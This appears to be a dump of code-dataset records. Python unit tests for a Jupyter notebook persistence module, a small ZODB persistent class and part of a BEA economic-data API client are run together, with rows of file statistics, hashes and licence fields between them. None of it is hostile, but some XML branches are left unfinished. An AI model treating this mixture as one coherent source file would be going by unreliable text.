def test_initialize_notebook_will_error_on_requirements_pull(self, rg, _client, _requirements, _op, _makedirs):
    """A failing (500) download surfaces as NotebookManagementError.

    NOTE(review): requests.get is mocked globally here, so the 500 applies to
    the notebook pull path as well — either failing download should raise.
    """
    url = 'http://whatever'
    rg.return_value = MagicMock(spec=requests.Response, status_code=500)
    platform_persistence.get_client().notebooks.get.return_value.requirements_url = url
    self.assertRaises(NotebookManagementError,
                      lambda: platform_persistence.initialize_notebook_from_platform(TEST_NOTEBOOK_PATH))
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
def test_post_save_fetches_urls_from_api(self, _rput, client, _ccc, _op):
    """Saving a notebook asks the API for its update links (keyed by platform object id)."""
    platform_persistence.post_save({'type': 'notebook'}, '', {})
    platform_persistence.get_client().notebooks.list_update_links.assert_called_with(TEST_PLATFORM_OBJECT_ID)
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
@patch('civis_jupyter_notebooks.platform_persistence.save_notebook')
def test_post_save_performs_two_put_operations(self, save, rput, _client, _ccc, _op):
    """post_save on a notebook triggers the save path.

    NOTE(review): the test name promises two PUT operations but only
    save_notebook is asserted; `rput` is injected yet unused — consider
    asserting rput.call_count as well, or renaming the test.
    """
    platform_persistence.post_save({'type': 'notebook'}, '', {})
    self.assertTrue(save.called)
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
@patch('civis_jupyter_notebooks.platform_persistence.save_notebook')
@patch('civis_jupyter_notebooks.platform_persistence.get_update_urls')
def test_post_save_skipped_for_non_notebook_types(self, guu, save, _rput, _client, _ccc, _op):
    """post_save ignores models whose type is not 'notebook' — nothing is fetched or saved."""
    platform_persistence.post_save({'type': 'blargggg'}, '', {})
    self.assertFalse(guu.called)
    self.assertFalse(save.called)
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
def test_post_save_generates_preview(self, _rput, _client, check_call, _op):
    """Saving converts the notebook to HTML via nbconvert, run from the notebook's directory."""
    platform_persistence.post_save({'type': 'notebook'}, 'x/y', {})
    # os_path 'x/y' is split: cwd='x', filename 'y' passed to nbconvert.
    check_call.assert_called_with(['jupyter', 'nbconvert', '--to', 'html', 'y'], cwd='x')
@patch('civis_jupyter_notebooks.platform_persistence.open')
@patch('civis_jupyter_notebooks.platform_persistence.check_call')
@patch('civis.APIClient')
@patch('requests.put')
def test_generate_preview_throws_error_on_convert(self, _rput, _client, check_call, _op):
    """An nbconvert failure is wrapped in NotebookManagementError.

    Mock arguments arrive in bottom-up decorator order; check_call is the
    patched platform_persistence.check_call.
    """
    # BUG FIX: CalledProcessError's signature is (returncode, cmd); the
    # original passed them swapped as ('foo', 255).
    check_call.side_effect = subprocess.CalledProcessError(255, 'foo')
    self.assertRaises(NotebookManagementError,
                      lambda: platform_persistence.generate_and_save_preview('http://notebook_url_in_s3', 'os/path'))
    # 'os/path' is split: cwd='os', filename 'path' handed to nbconvert.
    check_call.assert_called_with(['jupyter', 'nbconvert', '--to', 'html', 'path'], cwd='os')
@patch('civis.APIClient')
def test_will_regenerate_api_client(self, mock_client):
    """get_client constructs a civis.APIClient (called with no arguments)."""
    platform_persistence.get_client()
    mock_client.assert_called_with()
@patch('os.path.isfile')
@patch('os.path.isdir')
@patch('civis_jupyter_notebooks.platform_persistence.pip_install')
def test_find_and_install_requirements_calls_pip_install(self, pip_install, isdir, isfile):
    """A requirements.txt next to the notebook directory is pip-installed."""
    # CLEANUP: use the injected mocks directly; the original set
    # os.path.isdir.return_value / os.path.isfile.return_value, which only
    # worked because @patch had already swapped in these same mock objects.
    isdir.return_value = True
    isfile.return_value = True
    platform_persistence.find_and_install_requirements('/root/work/foo')
    pip_install.assert_called_with('/root/work/foo/requirements.txt')
@patch('os.path.isfile')
@patch('os.path.isdir')
@patch('civis_jupyter_notebooks.platform_persistence.pip_install')
def test_find_and_install_requirements_searches_tree(self, pip_install, isdir, isfile):
    """When no requirements.txt is found in the leaf dir, the parent is searched."""
    # CLEANUP: drive the injected mocks directly instead of via os.path
    # (identical objects once patched, but this is explicit).
    isdir.return_value = True
    # First lookup (/root/work/foo) misses, second (/root/work) hits.
    isfile.side_effect = [False, True]
    platform_persistence.find_and_install_requirements('/root/work/foo')
    pip_install.assert_called_with('/root/work/requirements.txt')
@patch('os.path.isfile')
@patch('os.path.isdir')
@patch('civis_jupyter_notebooks.platform_persistence.pip_install')
def test_find_and_install_requirements_excludes_root(self, pip_install, isdir, isfile):
    """The search never installs a requirements.txt sitting at /root itself."""
    # CLEANUP: configure the injected mocks directly (see sibling tests).
    isdir.return_value = True
    isfile.return_value = True
    platform_persistence.find_and_install_requirements('/root')
    pip_install.assert_not_called()
@patch('subprocess.check_output')
@patch('sys.executable')
def test_pip_install_calls_subprocess(self, executable, check_output):
    """pip_install shells out to `<python> -m pip install -r <file>` capturing stderr.

    sys.executable is patched to a MagicMock so the same object can be
    asserted inside the expected command list.
    """
    platform_persistence.pip_install('/path/requirements.txt')
    check_output.assert_called_with(
        [executable, '-m', 'pip', 'install', '-r', '/path/requirements.txt'],
        stderr=subprocess.STDOUT
    )
@patch('subprocess.check_output')
@patch('sys.executable')
def test_pip_install_failure_raises_notebookmanagementerror(self, executable, check_output):
    """A failing pip run is wrapped in NotebookManagementError carrying pip's output."""
    check_output.side_effect = subprocess.CalledProcessError(returncode=1, cmd='cmd', output=b'installation error')
    # The captured pip output must appear in the raised error's message.
    with self.assertRaisesRegex(NotebookManagementError, 'installation error'):
        platform_persistence.pip_install('/path/requirements.txt')
# Allow running this test module directly with `python <file>`.
if __name__ == '__main__':
    unittest.main()
| 54.097458
| 121
| 0.746064
| 1,496
| 12,767
| 5.96992
| 0.120321
| 0.151047
| 0.091703
| 0.12339
| 0.777293
| 0.772814
| 0.743366
| 0.728026
| 0.719964
| 0.701041
| 0
| 0.003485
| 0.145845
| 12,767
| 235
| 122
| 54.32766
| 0.815497
| 0.006893
| 0
| 0.614634
| 0
| 0
| 0.254992
| 0.181043
| 0
| 0
| 0
| 0
| 0.112195
| 1
| 0.107317
| false
| 0
| 0.043902
| 0.004878
| 0.165854
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
13aaf17d5a9e12bae05995db35d9c886f2eb404a
| 315
|
py
|
Python
|
zodb/model.py
|
thinkle/snippets
|
a19fd709fc618cee9d76b7481b834c3e0d4ed397
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
zodb/model.py
|
thinkle/snippets
|
a19fd709fc618cee9d76b7481b834c3e0d4ed397
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
zodb/model.py
|
thinkle/snippets
|
a19fd709fc618cee9d76b7481b834c3e0d4ed397
|
[
"BSD-2-Clause-FreeBSD"
] | 1
|
2019-08-28T22:06:53.000Z
|
2019-08-28T22:06:53.000Z
|
import persistent
class Model(persistent.Persistent):
    """A persistent record holding a single payload in ``data``.

    The payload passed at construction time is also captured privately and
    exposed read-only through :meth:`private`; the ``x`` property is a
    read/write alias for ``data``.
    """

    def __init__(self, data):
        self.data = data        # public, mutable payload
        self.__private = data   # snapshot taken at construction

    def private(self):
        """Return the payload captured at construction time."""
        return self.__private

    def _read_x(self):
        return self.data

    def _write_x(self, data):
        self.data = data

    # Read/write alias for ``data`` (equivalent to the decorator form).
    x = property(_read_x, _write_x)
| 16.578947
| 35
| 0.596825
| 38
| 315
| 4.736842
| 0.342105
| 0.222222
| 0.133333
| 0.177778
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.311111
| 315
| 18
| 36
| 17.5
| 0.829493
| 0
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.076923
| 0.153846
| 0.615385
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
13ac50a584ec16e8fcdb0af8c574ae3956a159d5
| 77,643
|
py
|
Python
|
datapungibea/drivers.py
|
jjotterson/beafullfetchpy
|
47d492f79e620ad967593982887d9428756cd63b
|
[
"MIT"
] | 13
|
2019-09-24T16:32:40.000Z
|
2021-09-27T08:40:24.000Z
|
datapungibea/drivers.py
|
jjotterson/beafullfetchpy
|
47d492f79e620ad967593982887d9428756cd63b
|
[
"MIT"
] | 3
|
2020-12-08T22:16:56.000Z
|
2020-12-24T20:40:30.000Z
|
datapungibea/drivers.py
|
jjotterson/beafullfetchpy
|
47d492f79e620ad967593982887d9428756cd63b
|
[
"MIT"
] | 2
|
2019-11-05T23:30:23.000Z
|
2020-12-17T23:41:04.000Z
|
import pandas as pd
import requests
import json
from copy import deepcopy
import pyperclip
import math
import re
from datetime import datetime
from datapungibea import generalSettings
from datapungibea import vintage as vintageFns
from datapungibea import utils
from datapungibea.config import CFGnipaSummary
# (1) Auxiliary functions ######################################################
def _getBaseRequest(baseRequest={},connectionParameters={},userSettings={}):
'''
Write a base request. This is the information that gets used in most requests such as getting the userKey
'''
if baseRequest =={}:
connectInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
return(connectInfo.baseRequest)
else:
return(baseRequest)
def _getBaseCode(codeEntries):
    '''
    Return the boilerplate (as a code string) that lets a user replicate a
    driver's request with `requests` directly.  The snippet loads the API key
    from whichever store the user configured (json / env / yaml).

    Args:
        codeEntries (list): kept for interface compatibility; not used here.

    Returns:
        str: the boilerplate code.

    Raises:
        ValueError: if the configured key-storage format is not supported
            (previously this left `code` unbound and raised a NameError).
    '''
    userSettings = utils.getUserSettings()
    pkgConfig = utils.getPkgConfig()
    # Storage format is inferred from the ApiKeysPath extension (json/env/yaml).
    storagePref = userSettings['ApiKeysPath'].split('.')[-1]
    passToCode = {'ApiKeyLabel': userSettings["ApiKeyLabel"], "url": pkgConfig['url'], 'ApiKeysPath': userSettings['ApiKeysPath']}
    if storagePref == 'json':
        code = '''
import requests
import json
import pandas as pd

# json file should contain: {{"BEA":{{"key":"YOUR KEY","url": "{url}" }}}}

apiKeysFile = '{ApiKeysPath}'
with open(apiKeysFile) as jsonFile:
    apiInfo = json.load(jsonFile)
url,key = apiInfo['{ApiKeyLabel}']['url'], apiInfo['{ApiKeyLabel}']['key']
'''.format(**passToCode)
    elif storagePref == 'env':
        code = '''
import requests
import os
import pandas as pd

url = "{url}"
key = os.getenv("{ApiKeyLabel}")
'''.format(**passToCode)
    elif storagePref == 'yaml':
        code = '''
import requests
import yaml
import pandas as pd

apiKeysFile = '{ApiKeysPath}'
with open(apiKeysFile, 'r') as stream:
    apiInfo= yaml.safe_load(stream)
url,key = apiInfo['{ApiKeyLabel}']['url'], apiInfo['{ApiKeyLabel}']['key']
'''.format(**passToCode)
    else:
        # BUG FIX: an unrecognized storage format used to fall through and
        # raise `NameError: name 'code' is not defined` at the return.
        raise ValueError('unsupported API key storage format: ' + storagePref)
    return code
def _getCode(query, userSettings={}, pandasCode=""):
    '''
    Return runnable code (a string) that reproduces the given request with
    `requests` directly, with the user key and url factored out as variables.

    Args:
        query (dict): the request that was made ('url' and 'params' keys).
        userSettings (dict): settings holding 'ApiKeysPath'; empty means
            "use the package-level settings".
        pandasCode (str): driver-specific snippet that turns the response
            into a DataFrame; appended to the generated code.

    Returns:
        str: base boilerplate plus the driver-specific query code.
    '''
    # general code to all drivers:
    try:
        url = query['url']
        if not userSettings:  # empty dict -> fall back to package-level settings
            apiKeyPath = generalSettings.getGeneralSettings().userSettings['ApiKeysPath']
        else:
            apiKeyPath = userSettings['ApiKeysPath']
    except Exception:
        # CLEANUP: narrowed from a bare `except:`; still deliberately
        # best-effort — the generated snippet degrades to placeholders.
        url = " incomplete connection information "
        apiKeyPath = " incomplete connection information "
    baseCode = _getBaseCode([url, apiKeyPath])

    # specific code to this driver: scrub the real url/key out of the query
    # so the generated snippet references the `url`/`key` variables instead.
    queryClean = deepcopy(query)
    queryClean['url'] = 'url'
    queryClean['params']['UserID'] = 'key'
    queryCode = '''
query = {}
retrivedData = requests.get(**query)

{} #replace json by xml if this is the request format
'''.format(json.dumps(queryClean), pandasCode)
    # Turn the JSON-dumped placeholders back into variable references.
    queryCode = queryCode.replace('"url": "url"', '"url": url')
    queryCode = queryCode.replace('"UserID": "key"', '"UserID": key')
    return baseCode + queryCode
def _clipcode(self):
'''
Copy the string to the user's clipboard (windows only)
'''
try:
pyperclip.copy(self._lastLoad['code'])
except:
print("Loaded session does not have a code entry. Re-run with verbose option set to True. eg: v.drivername(...,verbose=True)")
# (2) Drivers ###################################################################
class getDatasetlist():
    '''
    Driver that lists the datasets available in the BEA API.
    '''
    def __init__(self, baseRequest={}, connectionParameters={}, userSettings={}):
        # NOTE: dict defaults kept for interface compatibility; none are mutated.
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)  # TODO: could just pass the output of _connectionInfo here.
        self._lastLoad = {}  # data stored here to assist functions such as clipcode

    def datasetlist(self, params={}, verbose=False):
        '''
        Get the list of available datasets in the BEA API.

        Sample run -
            datasetlist()

        Args:
            verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        query = deepcopy(self._baseRequest)
        query['params'].update({'method': 'GETDATASETLIST'})
        retrivedData = requests.get(**query)
        df_output = self._cleanOutput(query, retrivedData)
        if verbose == False:
            self._lastLoad = df_output
            return(df_output)
        else:
            code = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output = dict(dataFrame=df_output, request=retrivedData, code=code)
            self._lastLoad = output
            return(output)

    def _cleanOutput(self, query, retrivedData):
        '''Normalize the API response into a DataFrame; attach optional Notes as .meta.'''
        if query['params']['ResultFormat'] == 'JSON':
            self._cleanCode = "df_output = pd.DataFrame( retrivedData.json()['BEAAPI']['Results']['Dataset'] )"
            df_output = pd.DataFrame( retrivedData.json()['BEAAPI']['Results']['Dataset'] )
            df_output.meta = ''
            try:
                df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
            except Exception:  # Notes are optional; best-effort only
                pass
        else:
            # BUG FIX: the generated snippet previously omitted the
            # "df_output = " assignment, so the replication code it produced
            # never defined df_output.
            self._cleanCode = "df_output = pd.DataFrame( retrivedData.json()['BEAAPI']['Results']['Dataset'] )"
            df_output = pd.DataFrame( retrivedData.xml()['BEAAPI']['Results']['Dataset'] )  # TODO: check this works — requests.Response has no .xml(); presumably XML parsing was intended
            df_output.meta = ''
            try:
                df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
            except Exception:
                pass
        return(df_output)

    def clipcode(self):
        '''Copy the replication code of the last verbose load to the clipboard.'''
        _clipcode(self)

    def _driverMetadata(self):
        self.metadata = [{
            "displayName": "List of Datasets",
            "method": "datasetlist",  # Name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getNIPA():
    '''
    Driver for the National Income and Product Account (NIPA) dataset of the BEA API.
    '''
    def __init__(self, baseRequest={}, connectionParameters={}, userSettings={}):
        '''
        the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
        '''
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions such as clipcode

    def NIPA(self,
             tableName,
             frequency='Q',
             year='X',
             payload={'method': 'GETDATA', 'DATABASENAME': 'NIPA', 'datasetname': 'NIPA', 'ParameterName': 'TableID'},
             outputFormat="tablePretty",
             verbose=False,
             includeIndentations=True
             ):
        '''
        Get National Income and Product Account (NIPA) data.  Most parameters are set to deafault values; passing
        tableName will return a value of quarterly data in all available years.  Sample run -
            NIPA('T10101')
            NIPA('T10101', frequency = 'A', year='X',verbose=True,includeIndentation=False)

        Args:
            tableName (str): name of NIPA table, for example T10101
            frequency (str): frequency of data - Annual (A), quarterly (Q) or monthly (M); default to Q
            year (str): specific year or X for all years - eg, '2019' or 'X'; default to X
            payload (dict): this is the base request information of a BEA NIPA query; default - {'method': 'GETDATA', 'DATABASENAME': 'NIPA', 'datasetname': 'NIPA', 'ParameterName': 'TableID'}
            outputFormat (str): tablePretty will clean up data and return pandas of variable by date; else returns table of (variable,date) by data; default to tablePretty
            verbose (bool): If false just return a pandas table; else return table, the request result and the code used; default to False
            includeIndentations (bool): API does not include indentation of the table, indicate if should include it; default to True
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
        # load user preferences defined in userSettings, use suggested parameters, override w fun entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'TABLENAME': tableName})
        query['params'].update({'FREQUENCY': frequency})
        query['params'].update({'YEAR': year})
        query['params'].update(payload)
        # TODO: try loading different frenquencies if no return
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData, outputFormat, includeIndentations)  # a dict of a df or df and meta (tablePretty)
        if verbose == False:
            self._lastLoad = output['dataFrame']
            return(self._lastLoad)
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return(output)

    def _cleanOutput(self, query, retrivedData, outputFormat, includeIndentations):
        '''Normalize the raw API response; optionally pivot it into a pretty table.'''
        if query['params']['ResultFormat'] == 'JSON':
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])
            df_output.meta = ''
            try:
                df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
            except Exception:  # Notes are optional; best-effort only
                pass
        else:
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Data'])  # TODO: check this works — this branch is meant for XML but still parses JSON
            df_output.meta = ''
            try:
                df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
            except Exception:
                pass
        output = {'dataFrame': df_output}
        if outputFormat == "tablePretty":
            df_output['LineNumber'] = pd.to_numeric(df_output['LineNumber'])
            df_output['DataValue'] = pd.to_numeric(df_output['DataValue'].apply(lambda x: x.replace(',', '')))
            # Split the descriptive columns into a separate metadata table.
            meta = df_output.drop(['DataValue', 'TimePeriod'], axis=1).drop_duplicates()
            meta = meta.set_index(['LineNumber', 'SeriesCode', 'LineDescription']).reset_index()
            df_output = df_output[['LineNumber', 'SeriesCode', 'LineDescription', 'DataValue', 'TimePeriod']]
            df_output = pd.pivot_table(df_output, index=['LineNumber', 'SeriesCode', 'LineDescription'], columns='TimePeriod', values='DataValue', aggfunc='first')
            df_output = self._includeIndentations(df_output, query['params']['TABLENAME'], includeIndentations)
            # NOTE(review): setting .meta on a DataFrame is fragile — pandas may
            # drop the attribute on copies; confirm downstream reliance.
            df_output.meta = ''
            try:
                df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
            except Exception:
                pass
            output = {'dataFrame': df_output, 'metadata': meta}
            # update the code string so the generated snippet mirrors the cleanup above:
            self._cleanCode = self._cleanCode + "\ndf_output['LineNumber'] = pd.to_numeric(df_output['LineNumber']) \n"
            self._cleanCode = self._cleanCode + "df_output['DataValue'] = pd.to_numeric(df_output['DataValue'].apply(lambda x: x.replace(',',''))) \n"
            self._cleanCode = self._cleanCode + "df_output = df_output[['LineNumber', 'SeriesCode', 'LineDescription', 'DataValue', 'TimePeriod']] \n"
            self._cleanCode = self._cleanCode + "df_output = pd.pivot_table(df_output, index=['LineNumber', 'SeriesCode', 'LineDescription'], columns='TimePeriod', values='DataValue', aggfunc='first') \n"
            #if includeIndentations:
            #self._cleanCode = self._cleanCode + '\n#Including indentations:'
            #self._cleanCode = self._cleanCode + '\nimport datapungibea as dpb \ndata = dpb.data() \ndf_output = data.getNIPA._includeIndentations(df_output,"'+query['params']['TABLENAME']+'")\n'
            #self._cleanCode = self._cleanCode + '#can get all indentations running: from datapungibea.config.CFGindentations import indentations as cfgIndentations \n'
        return(output)

    def _includeIndentations(self, df_output, tableName, includeIndentations=True):  # tableName = query['params']['TABLENAME']
        '''Prefix LineDescription with '-' per indentation level from the packaged config.'''
        if not includeIndentations:
            return(df_output)
        from datapungibea.config.CFGindentations import indentations as cfgIndentations  # TODO: move this to __init__
        cfgCases = list(filter(lambda x: tableName in x['tableName'], cfgIndentations))
        if len(cfgCases) < 1:
            return(df_output)
        else:
            try:
                indentTable = cfgCases[0]
                indentTable = pd.DataFrame(list(zip(indentTable['LineNumber'], indentTable['SeriesCode'], indentTable['Indentations'])), columns=['LineNumber', 'SeriesCode', 'Indentations'])
                df_output.reset_index(inplace=True)
                df_output = df_output.merge(indentTable, on=['LineNumber', 'SeriesCode'], how='left')  # left merge keeps rows with no indentation info
                df_output['Indentations'].fillna(0, inplace=True)
                df_output['LineDescription'] = df_output.apply(lambda x: '-'*x['Indentations'] + x['LineDescription'], axis=1)
                df_output.drop('Indentations', axis=1, inplace=True)
                df_output.set_index(['LineNumber', 'SeriesCode', 'LineDescription'], inplace=True)
            except Exception:
                # CLEANUP: narrowed from bare except; indentation is cosmetic,
                # so failure degrades gracefully to the unindented table.
                print('could not include indentations on table ' + tableName + ' returning table without indentation info')
            return(df_output)

    def clipcode(self):
        '''Copy the replication code of the last verbose load to the clipboard.'''
        _clipcode(self)

    def _driverMetadata(self):
        # NOTE(review): these values look copy-pasted from getDatasetlist
        # ("datasetlist" is not this driver's main function) — confirm against
        # the metadata consumer before changing.
        self.metadata = [{
            "displayName": "List of Datasets",
            "method": "datasetlist",  # Name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getGetParameterList():
    '''
    Driver that lists the parameters needed to query a given BEA dataset.
    '''
    def __init__(self, baseRequest={}, connectionParameters={}, userSettings={}):
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions such as clipcode

    def getParameterList(self,
                         datasetname,
                         payload={'method': 'GetParameterList'},
                         verbose=False
                         ):
        '''
        Get the list of parameter needed to get data from dataset.

        Sample run -
            getParameterList('NIPA')

        Args:
            datasetname (str): the name of the dataset eg, NIPA
            payload (dict): the request payload that is basic to this driver; default to {'method': 'GetParameterList'}
            verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
        # load user preferences defined in userSettings, use suggested parameters, override w fun entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'datasetname': datasetname})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict of a df or df and meta (tablePretty)
        if verbose == False:
            self._lastLoad = output['dataFrame']
            return(output['dataFrame'])
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return(output)

    def _cleanOutput(self, query, retrivedData):
        '''Normalize the API response into a DataFrame; attach optional Notes as .meta.'''
        if query['params']['ResultFormat'] == 'JSON':
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Parameter'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Parameter'])
        else:
            # BUG FIX: the generated snippet previously omitted the
            # "df_output = " assignment, producing code that never defined df_output.
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Parameter'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['Parameter'])  # TODO: check this works — meant for XML but still parses JSON
        df_output.meta = ''
        try:
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # Notes are optional; best-effort only
            pass
        output = {'dataFrame': df_output}
        return(output)

    def clipcode(self):
        '''Copy the replication code of the last verbose load to the clipboard.'''
        _clipcode(self)

    def _driverMetadata(self):
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # Name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getGetParameterValues():
    '''
    Driver that lists the admissible values of a parameter of a BEA dataset.
    '''
    def __init__(self, baseRequest={}, connectionParameters={}, userSettings={}):
        '''
        the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
        '''
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions such as clipcode

    def getParameterValues(self,
                           datasetName,
                           parameterName,
                           payload={'method': 'getParameterValues'},
                           verbose=False
                           ):
        '''
        Get the list of values of a parameter of a database.

        Sample run -
            getParameterValues('NIPA','tableName')

        Args:
            datasetname (str): the name of the dataset eg, NIPA
            parameterName (str): the name of the parameter you want to know the values of; eg 'tableName'
            payload (dict): the request payload that is basic to this driver; default to {'method': 'getParameterValues'}
            verbose (bool): if returns that data in a pandas dataframe format or all available information; default to False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
        # load user preferences defined in userSettings, use suggested parameters, override w fun entry
        query = deepcopy(self._baseRequest)
        query['params'].update({'datasetname': datasetName})
        query['params'].update({'parameterName': parameterName})
        query['params'].update(payload)
        retrivedData = requests.get(**query)
        output = self._cleanOutput(query, retrivedData)  # a dict of a df or df and meta (tablePretty)
        if verbose == False:
            self._lastLoad = output['dataFrame']
            return(output['dataFrame'])
        else:
            output['code'] = _getCode(query, self._connectionInfo.userSettings, self._cleanCode)
            output['request'] = retrivedData
            self._lastLoad = output
            return(output)

    def _cleanOutput(self, query, retrivedData):
        '''Normalize the API response into a DataFrame; attach optional Notes as .meta.'''
        if query['params']['ResultFormat'] == 'JSON':
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['ParamValue'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['ParamValue'])
        else:
            # BUG FIX: the generated snippet previously omitted the
            # "df_output = " assignment, producing code that never defined df_output.
            self._cleanCode = "df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['ParamValue'])"
            df_output = pd.DataFrame(retrivedData.json()['BEAAPI']['Results']['ParamValue'])  # TODO: check this works — meant for XML but still parses JSON
        df_output.meta = ''
        try:
            df_output.meta = retrivedData.json()['BEAAPI']['Results']['Notes']
        except Exception:  # Notes are optional; best-effort only
            pass
        output = {'dataFrame': df_output}
        return(output)

    def clipcode(self):
        '''Copy the replication code of the last verbose load to the clipboard.'''
        _clipcode(self)

    def _driverMetadata(self):
        # NOTE(review): "GetParameterList" looks copy-pasted — this driver's
        # main function is getParameterValues; confirm against the metadata
        # consumer before changing.
        self.metadata = [{
            "displayName": "Parameter of Dataset",
            "method": "GetParameterList",  # Name of driver main function - run with getattr(data,'datasetlist')()
            "params": {},
        }]
class getMNE():
    '''
    Driver for the Multinational Enterprises (MNE) dataset of the BEA API.
    '''
    def __init__(self, baseRequest={}, connectionParameters={}, userSettings={}):
        '''
        the baseRequest contains user Key, url of datasource, and prefered output format (JSON vs XML)
        '''
        self._connectionInfo = generalSettings.getGeneralSettings(connectionParameters = connectionParameters, userSettings = userSettings )
        self._baseRequest = _getBaseRequest(baseRequest, connectionParameters, userSettings)
        self._lastLoad = {}  # data stored here to assist other functions such as clipcode

    def MNE(self,
            Frequency,
            TableID,
            DirectionOfInvestment,
            OwnershipLevel,
            NonbankAffiliatesOnly,
            Classification,
            Country,
            Industry,
            Year,
            State,
            SeriesID,
            GetFootnotes,
            Investment,
            ParentInvestment,
            payload={'method': 'GETDATA', 'datasetname': 'MNE', 'ParameterName': 'TableID'},
            outputFormat="tablePretty",
            verbose=False
            ):
        '''
        Query the MNE database

        Args:
            Frequency (str):
            TableID (str):
            DirectionOfInvestment (str):
            OwnershipLevel (str):
            NonbankAffiliatesOnly (str):
            Classification (str):
            Country (str):
            Industry (str):
            Year (str):
            State (str):
            SeriesID (str):
            GetFootnotes (str):
            Investment (str):
            ParentInvestment (str):
            payload (dict): default to {'method': 'GETDATA', 'datasetname': 'MNE', 'ParameterName': 'TableID'},
            outputFormat (str): default to "tablePretty",
            verbose (bool): default to False
        Returns:
            output: either a pandas dataframe or a dictionary (verbose=True) with dataFrame, request, and code
        '''
        # TODO: put the payload ={} all data in lowercase, else may repeat the load (say frequency=A and Frquency = Q will load A and Q)
